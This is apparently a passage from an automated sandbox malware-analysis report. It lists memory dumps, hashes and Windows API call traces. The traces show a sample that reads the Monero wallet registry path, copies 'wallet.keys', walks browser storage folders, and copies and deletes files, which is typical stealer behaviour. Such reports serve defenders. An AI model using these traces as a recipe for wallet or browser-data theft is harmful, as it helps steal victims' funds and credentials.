                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: +Ot
                        • API String ID: 0-2151047281
                        • Opcode ID: cfd18c3d8eca385ab37552f0123ea8fbc5ab072e95eb32dbaf4b676e2501c8e6
                        • Instruction ID: c74a497034bfa1ee84848fbd730c827e2620dd067a61c4aeb77b733a523949ab
                        • Opcode Fuzzy Hash: cfd18c3d8eca385ab37552f0123ea8fbc5ab072e95eb32dbaf4b676e2501c8e6
                        • Instruction Fuzzy Hash: C46126F3E193105FF3045E2DDC857A6B7DAEB94720F1A463D9B98937C0E9796C048286
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2<S
                        • API String ID: 0-2142661242
                        • Opcode ID: 83e726e11c51f4b8616141037a3d8848708037479b12ea857a2c92a9d04a3738
                        • Instruction ID: 5bfb6eb9ab1a6995d9f1b931da59ffd71b912b9b108621b99cbd03a1926abfd1
                        • Opcode Fuzzy Hash: 83e726e11c51f4b8616141037a3d8848708037479b12ea857a2c92a9d04a3738
                        • Instruction Fuzzy Hash: 765138F3E085149FF7046E39DC4576ABAD6ABD4320F2B863DD9D8D3384E93948468282
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: %Aw
                        • API String ID: 0-1545902326
                        • Opcode ID: 105c3bcb05f093875203f813446f164b83d9064395dafdef22cee4132720a4ae
                        • Instruction ID: d6b2fc2032fb53fe3730e17673ec38e837eea55a70c3d5258ef08491e242ff55
                        • Opcode Fuzzy Hash: 105c3bcb05f093875203f813446f164b83d9064395dafdef22cee4132720a4ae
                        • Instruction Fuzzy Hash: D351E6F3E041205BF3146A2DDC4576AB7D6EB94320F1B453DEB88D7380E9399C5686C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 809128cac2b0996c76490c686ea8b5ac6ce1b78254e6c062cc89da0c147b1486
                        • Instruction ID: d1a6063f56070a22f8d08dc4739d51c5e876a00813ff457bfa989cf74e22cbdf
                        • Opcode Fuzzy Hash: 809128cac2b0996c76490c686ea8b5ac6ce1b78254e6c062cc89da0c147b1486
                        • Instruction Fuzzy Hash: 415147F390C204AFE7147E29EC8576FBBE9EB94320F16463DEAD483744F63159118686
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 105948fa6a6cc30a236e48324813a0634f10b28c3569bf5076a56b1c4142f60e
                        • Instruction ID: 4e9e524f8c5619c2fce7f26a7d62665a85f199b1a2e565be391b0a5d42e3f9f0
                        • Opcode Fuzzy Hash: 105948fa6a6cc30a236e48324813a0634f10b28c3569bf5076a56b1c4142f60e
                        • Instruction Fuzzy Hash: E451C2F3A186009FE304AE2DED8577AB7D5DF94314F1A863DDBC4C3784E9395805868A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 633782f18895734dc656f278162e5edae1c4e5c854bd2eff810c4a217204d051
                        • Instruction ID: 14b065a95fd5ae46d4fa32ca06bf18b87e5954653007d951d9dff06b2a9120fc
                        • Opcode Fuzzy Hash: 633782f18895734dc656f278162e5edae1c4e5c854bd2eff810c4a217204d051
                        • Instruction Fuzzy Hash: 604155F7A096102FF708492DECA57B6A6C9DB95320F2B463EEB45D3BC4E8780C014296
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 04a4199a6cc069a0528d2dae77af40726403a29140296630f847b9054c186f3d
                        • Instruction ID: 6e36e0d2a3a9988ddd1e5e0420707ff979f226ac0f2ad0ef87965c482de3cf1d
                        • Opcode Fuzzy Hash: 04a4199a6cc069a0528d2dae77af40726403a29140296630f847b9054c186f3d
                        • Instruction Fuzzy Hash: C24136F3A083005FF350A969ECC4B7BB7D9EB84320F2A853DAB9493784E57858418696
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 00508636
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050866D
                        • lstrcpy.KERNEL32(?,00000000), ref: 005086AA
                        • StrStrA.SHLWAPI(?,0103DF18), ref: 005086CF
                        • lstrcpyn.KERNEL32(007293D0,?,00000000), ref: 005086EE
                        • lstrlen.KERNEL32(?), ref: 00508701
                        • wsprintfA.USER32 ref: 00508711
                        • lstrcpy.KERNEL32(?,?), ref: 00508727
                        • StrStrA.SHLWAPI(?,0103E0E0), ref: 00508754
                        • lstrcpy.KERNEL32(?,007293D0), ref: 005087B4
                        • StrStrA.SHLWAPI(?,0103DFD8), ref: 005087E1
                        • lstrcpyn.KERNEL32(007293D0,?,00000000), ref: 00508800
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                        • String ID: %s%s
                        • API String ID: 2672039231-3252725368
                        • Opcode ID: e5a935fb2a75373096fcce786d31b93101cb0c8764531f6bb8e3dfe1dbe6f348
                        • Instruction ID: 63cbb4c4d19433363ed9a0a9de980e116e64fdd3ade407a6027c92c9e4baab63
                        • Opcode Fuzzy Hash: e5a935fb2a75373096fcce786d31b93101cb0c8764531f6bb8e3dfe1dbe6f348
                        • Instruction Fuzzy Hash: 68F1A271901118AFDB20DB64DD48AEE7BB9FF88300F048559FA09E7291DB74AE41CFA5
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F1F9F
                        • lstrlen.KERNEL32(01038A70), ref: 004F1FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 004F1FE3
                        • lstrlen.KERNEL32(00521794), ref: 004F1FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F200E
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F2042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F204D
                        • lstrlen.KERNEL32(00521794), ref: 004F2058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2075
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F2081
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F20AC
                        • lstrlen.KERNEL32(?), ref: 004F20E4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2104
                        • lstrcat.KERNEL32(00000000,?), ref: 004F2112
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2139
                        • lstrlen.KERNEL32(00521794), ref: 004F214B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F216B
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F2177
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F219D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F21A8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F21D4
                        • lstrlen.KERNEL32(?), ref: 004F21EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F220A
                        • lstrcat.KERNEL32(00000000,?), ref: 004F2218
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2242
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F227F
                        • lstrlen.KERNEL32(0103D010), ref: 004F228D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F22B1
                        • lstrcat.KERNEL32(00000000,0103D010), ref: 004F22B9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F22F7
                        • lstrcat.KERNEL32(00000000), ref: 004F2304
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F232D
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004F2356
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2382
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F23BF
                        • DeleteFileA.KERNEL32(00000000), ref: 004F23F7
                        • FindNextFileA.KERNEL32(00000000,?), ref: 004F2444
                        • FindClose.KERNEL32(00000000), ref: 004F2453
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                        • String ID:
                        • API String ID: 2857443207-0
                        • Opcode ID: 6af3c102dd9cc51923041b8192938140d1c1eb11c488be25f413ae8c34ee9d3b
                        • Instruction ID: 3b3473fa65f195763bce07492b0353513d6b4c2e033de5d4a5f5013a467f35b2
                        • Opcode Fuzzy Hash: 6af3c102dd9cc51923041b8192938140d1c1eb11c488be25f413ae8c34ee9d3b
                        • Instruction Fuzzy Hash: 20E18F71A1121E9BCB21EF65DE85ABF77B9EF04304F04402AFA05A7251DBBCDD118B98
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506445
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506480
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005064AA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005064E1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506506
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050650E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506537
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FolderPathlstrcat
                        • String ID: \..\
                        • API String ID: 2938889746-4220915743
                        • Opcode ID: e60d0d3bd8ebbc5240173f70dbb28a0fa2465c8bddc1c1aaafa0b6ad1087145e
                        • Instruction ID: 968a8e364da907ed9a15b7c81e6fdd10c2854d2e039c2488371011ea434978f5
                        • Opcode Fuzzy Hash: e60d0d3bd8ebbc5240173f70dbb28a0fa2465c8bddc1c1aaafa0b6ad1087145e
                        • Instruction Fuzzy Hash: 5BF1A070E0120A9FDB21EF65DD49AAE7BB8BF40304F448029F905D7291DB78DD56CB98
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005043A3
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005043D6
                        • lstrcpy.KERNEL32(00000000,?), ref: 005043FE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00504409
                        • lstrlen.KERNEL32(\storage\default\), ref: 00504414
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504431
                        • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0050443D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504466
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00504471
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504498
                        • lstrcpy.KERNEL32(00000000,?), ref: 005044D7
                        • lstrcat.KERNEL32(00000000,?), ref: 005044DF
                        • lstrlen.KERNEL32(00521794), ref: 005044EA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504507
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00504513
                        • lstrlen.KERNEL32(.metadata-v2), ref: 0050451E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050453B
                        • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00504547
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050456E
                        • lstrcpy.KERNEL32(00000000,?), ref: 005045A0
                        • GetFileAttributesA.KERNEL32(00000000), ref: 005045A7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504601
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050462A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00504653
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050467B
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005046AF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                        • String ID: .metadata-v2$\storage\default\
                        • API String ID: 1033685851-762053450
                        • Opcode ID: 8715e34d853501eba18ceb88861df2d818a342bf5577f0e21a4c17d5b380c730
                        • Instruction ID: bab3ac786d3c5ce0880a712b26a5c4d4fd8741f789579155720e8440ca32ee78
                        • Opcode Fuzzy Hash: 8715e34d853501eba18ceb88861df2d818a342bf5577f0e21a4c17d5b380c730
                        • Instruction Fuzzy Hash: 4FB1A6B0A1121A9BCB31EF75DD49AAF7BB8BF00304F045029FA45D7291DB78DD528B98
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005057D5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00505804
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505835
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050585D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00505868
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505890
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005058C8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005058D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005058F8
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050592E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505956
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00505961
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505988
                        • lstrlen.KERNEL32(00521794), ref: 0050599A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005059B9
                        • lstrcat.KERNEL32(00000000,00521794), ref: 005059C5
                        • lstrlen.KERNEL32(0103CFE0), ref: 005059D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005059F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00505A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505A2C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505A58
                        • GetFileAttributesA.KERNEL32(00000000), ref: 00505A5F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00505AB7
                        • lstrcpy.KERNEL32(00000000,?), ref: 00505B2D
                        • lstrcpy.KERNEL32(00000000,?), ref: 00505B56
                        • lstrcpy.KERNEL32(00000000,?), ref: 00505B89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505BB5
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00505BEF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00505C4C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00505C70
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 2428362635-0
                        • Opcode ID: 9ed3eb83fffde357b775e23c0da7b14301ae428256e03d872acee6ebd8863ed2
                        • Instruction ID: 99ddf9a09fafa9403aae15bbe911e05c5fc553977a1a2ed3bb0dc16671c38f50
                        • Opcode Fuzzy Hash: 9ed3eb83fffde357b775e23c0da7b14301ae428256e03d872acee6ebd8863ed2
                        • Instruction Fuzzy Hash: 2E02C370A016099FCB21EF65C989AAF7BB9FF44304F148129F90597290EB78DD46CF98
                        APIs
                          • Part of subcall function 004F1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004F1135
                          • Part of subcall function 004F1120: RtlAllocateHeap.NTDLL(00000000), ref: 004F113C
                          • Part of subcall function 004F1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004F1159
                          • Part of subcall function 004F1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004F1173
                          • Part of subcall function 004F1120: RegCloseKey.ADVAPI32(?), ref: 004F117D
                        • lstrcat.KERNEL32(?,00000000), ref: 004F11C0
                        • lstrlen.KERNEL32(?), ref: 004F11CD
                        • lstrcat.KERNEL32(?,.keys), ref: 004F11E8
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F121F
                        • lstrlen.KERNEL32(01038A70), ref: 004F122D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1251
                        • lstrcat.KERNEL32(00000000,01038A70), ref: 004F1259
                        • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 004F1264
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1288
                        • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 004F1294
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F12BA
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F12FF
                        • lstrlen.KERNEL32(0103D010), ref: 004F130E
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1335
                        • lstrcat.KERNEL32(00000000,?), ref: 004F133D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1378
                        • lstrcat.KERNEL32(00000000), ref: 004F1385
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F13AC
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 004F13D5
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1401
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F143D
                          • Part of subcall function 0050EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0050EE12
                        • DeleteFileA.KERNEL32(?), ref: 004F1471
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                        • String ID: .keys$\Monero\wallet.keys
                        • API String ID: 2881711868-3586502688
                        • Opcode ID: d57428b738bb82ba8e2433dc668127b21e2ddcad197cd9d5eedbd60a73d9e1c4
                        • Instruction ID: e4a9f6cd210123054eab0c05652f9e90f0168d42168652e798af76d816ae1a36
                        • Opcode Fuzzy Hash: d57428b738bb82ba8e2433dc668127b21e2ddcad197cd9d5eedbd60a73d9e1c4
